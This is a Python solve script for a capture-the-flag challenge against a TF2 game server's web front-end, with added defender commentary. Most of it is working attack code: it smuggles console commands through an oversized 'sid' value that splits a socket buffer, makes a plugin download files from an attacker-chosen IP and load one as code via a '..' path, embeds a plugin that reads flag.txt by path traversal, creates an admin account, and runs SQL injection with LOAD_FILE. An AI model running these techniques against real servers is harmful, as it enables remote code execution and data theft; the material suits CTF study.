import requests | |
import time | |
######################################
#### Leaked old video how plugin works
#### https://youtu.be/r_nzF7LJpNM
######################################
# Base URL of the challenge's web front-end; every request in this script is
# built from it. Judging by the ``ip``/``port`` query parameters sent in
# ``cmd`` below, the web tier forwards the ``sid`` value on to a socket
# listener on the game server side -- confirm against the challenge source.
task_addr: str = 'http://painterhell.web.jctf.pro:1337'
# BUG (author's note): if you send more than 16330 bytes, OnChildSocketReceive
# splits "receiveData" into two packets. The bug is in socket.so here:
# https://github.com/nefarius/sm-ext-socket/blob/ed6bf7a12bd3f801610592301e12062b367fa27b/Socket.cpp#L233
# -- it has a 16384-byte buffer for one function call.
#
# Defender's view: the receiver treats each socket read as one complete
# message, so an oversized value is re-parsed from the point where the
# buffer ran out. Proper message framing on the receiver, and an upper bound
# on ``sid`` length at the web tier, would each remove the split.
#
# 8165 * 2 = 16330 filler bytes, the threshold named in the note above.
_SPLIT_FILLER = b'/.' * 8165


def _deliver(sid):
    """Send ``sid`` to the colours endpoint (GET, then POST) and classify the reply.

    Both requests carry ``sid`` as a query parameter. The GET additionally
    names ``127.0.0.1:52570`` as ip/port (presumably the game server's socket
    listener -- confirm against the challenge source); the POST submits a
    throw-away colour record. Status code and the first 100 bytes of each
    body are echoed to stdout for debugging.

    Returns:
        True if the text inside the first ``<div class="info"`` of the POST
        response contains ``Bad data!``, else False.

    Raises:
        IndexError: when the POST response contains no ``<div class="info"``.
    """
    colors_url = task_addr + '/tf/colors/'

    status_probe = requests.get(colors_url, params={
        'port': '52570',
        'ip': '127.0.0.1',
        'sid': sid,
    })
    print(status_probe.status_code)
    print(status_probe.content[:100])

    dummy_record = {'nazwa': 't', 'rgb1': '00', 'rgb2': '00'}
    result = requests.post(colors_url, params={'sid': sid}, data=dummy_record)
    print(result.status_code)
    print(result.content[:100])

    after_open_tag = result.content.split(b'<div class="info"')[1]
    info_text = after_open_tag.split(b'</div>')[0]
    print(info_text)
    return b'Bad data!' in info_text


def cmd(cmd):
    """Push one console command through the oversized-``sid`` split.

    The filler pushes the ``//cmd:`` marker past the 16330-byte point from
    the author's note, so that (presumably) the second fragment is parsed as
    a command on its own.

    Args:
        cmd: raw command bytes appended after the ``//cmd:`` marker.

    Returns:
        True if the server answered ``Bad data!`` in its info block,
        False otherwise (see ``_deliver``).
    """
    return _deliver(_SPLIT_FILLER + b'//cmd:' + cmd)


def sqlinjection(steamid, injection):
    """Push one ``kolory`` record through the oversized-``sid`` split.

    The record has the shape ``<steamid>;<name>;0;0``; the author marks the
    name field as the SQL injection point, so ``injection`` is placed there
    verbatim. Parameterizing the statement that stores this record is the
    server-side fix.

    Args:
        steamid: Steam id written into the first field of the record.
        injection: raw SQL fragment written into the name field.

    Returns:
        True if the server answered ``Bad data!`` in its info block,
        False otherwise (see ``_deliver``).
    """
    record = f'//kolory:{steamid};{injection};0;0'.encode()
    return _deliver(_SPLIT_FILLER + record)
def solve_rce_way():
    """First solution path from the write-up: make the game server load a
    plugin under the author's control, then read the flag in-game.

    Only steps 2 and 3 are automated here (two ``cmd`` calls with a 5 s
    pause between them); steps 1 and 4 are done by hand. Each ``cmd`` call
    goes through the oversized-``sid`` split described on ``cmd``.

    Defender's view: the chain relies on (a) a console command that
    re-points the plugin's update host at an arbitrary address and (b)
    ``sm plugins load`` accepting a ``..``-relative path into the data
    directory, so a freshly downloaded data file is loaded as code.
    Pinning the update host and rejecting traversal in the loader would
    each break the chain.
    """
    # 1. write custom http server
    # it should return compiled "leakflag.smx", example source code for reading flag:
    # (the SourcePawn below is an unused string literal kept for reference;
    # this script never executes or sends it)
    '''
    #include <sourcemod>
    #define PLUGIN_VERSION "0.0.1"
    #define PLUGIN_NAME "LeakFlag"
    public Plugin:myinfo =
    {
    name = PLUGIN_NAME,
    author = "Cypis",
    description = "",
    version = PLUGIN_VERSION,
    url = "http://steamcommunity.com/id/cypiss/"
    }
    public OnPluginStart()
    {
    RegConsoleCmd("sm_flag", CmdFlag);
    }
    public Action:CmdFlag(client, args)
    {
    if(!IsClientInGame(client))
    return Plugin_Continue;
    new Handle:open = OpenFile("../../../../../../../../../../../../../../../../../../flag.txt", "rt");
    decl String:szText[128];
    while(!IsEndOfFile(open))
    {
    ReadFileLine(open, szText, sizeof(szText));
    PrintToChatAll("ReadFile: %s", szText);
    }
    CloseHandle(open);
    return Plugin_Continue;
    }
    '''
    # 2. efekty_new.smx now should connect to our http server and download files "hats_info_pl.txt", etc.
    cmd(b';'.join([
        b'sm_efekty_status 908337898',  # plugin should connect to http://908337898/ (ip as a single integer)
        b'sm plugins reload 1',  # reload plugin
        b'sm_items_update',  # download files from http://908337898/
    ]))
    time.sleep(5)  # give the plugin time to finish the download before loading the file
    # 3. load our exploit for reading flag.txt and printing
    cmd(b'sm plugins load ..\\data\\hats_info_pl.txt')
    # 4. [HUMAN JOB] connect to TF2 server and write "!flag"
    # Screen: https://media.discordapp.net/attachments/656261024554549253/805512618428071946/Zrzut_ekranu_2021-01-31_o_19.58.57.png?width=788&height=1067
    pass
def solve_sqlinjection_way():
    """Second solution path from the write-up: pull the flag into the
    PlayerColors table through the injection in the record's name field,
    then view it in the in-game colours menu.

    Steps 1 and 4 are manual; steps 2 and 3 are automated with ``cmd`` and
    ``sqlinjection``. The flag is fetched in 20-character slices because,
    per the author's note, the TF2 client menu shows at most 20 characters
    per entry.

    Defender's view: the fragments only work because the name value is
    spliced into what is apparently an INSERT statement and the MySQL
    account evidently holds the FILE privilege needed for ``LOAD_FILE``.
    A parameterized statement and a least-privilege DB user would each
    stop this path.
    """
    # 1. [HUMAN JOB] connect to the server
    pass
    # 2. create admin to my steam account
    cmd(b';'.join([
        b'sm plugins load disabled\\sql-admin-manager.smx',
        b'sm plugins load disabled\\admin-sql-prefetch.smx',
        b'sm plugins load disabled\\basecommands.smx',
        b'sm_create_adm_tables',
        b'sm_sql_addadmin cypis steam "STEAM_0:0:30683735" p 99',
        b'sm_reloadadmins',
    ]))
    # 3. load flag into PlayerColors table.
    # BTW: tf2 client can only show 20 characters in "menu"
    # 0x2f666c61672e747874 is the hex encoding of the path "/flag.txt".
    # Each pair of calls first stores a slice of the file in the COLOR column
    # under a fresh key (x, y, z, j), then re-sends the same key so that
    # ON DUPLICATE KEY UPDATE copies it into NAME -- the column the menu shows.
    # This reading is inferred from the payload shape; confirm against the
    # challenge's schema.
    sqlinjection('STEAM_0:0:30683735', "x',LOAD_FILE(0x2f666c61672e747874),0)#")
    sqlinjection('STEAM_0:0:30683735', "x','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#")
    sqlinjection('STEAM_0:0:30683735', "y',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),20),0)#")
    sqlinjection('STEAM_0:0:30683735', "y','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#")
    sqlinjection('STEAM_0:0:30683735', "z',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),40),0)#")
    sqlinjection('STEAM_0:0:30683735', "z','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#")
    sqlinjection('STEAM_0:0:30683735', "j',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),60),0)#")
    sqlinjection('STEAM_0:0:30683735', "j','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#")
    # 4. [HUMAN JOB] now write on chat "!colors" and go to "!usun" tab and you will see flag!
    # Screen: https://media.discordapp.net/attachments/656261024554549253/805512618773184582/Zrzut_ekranu_2021-01-31_o_19.59.09.png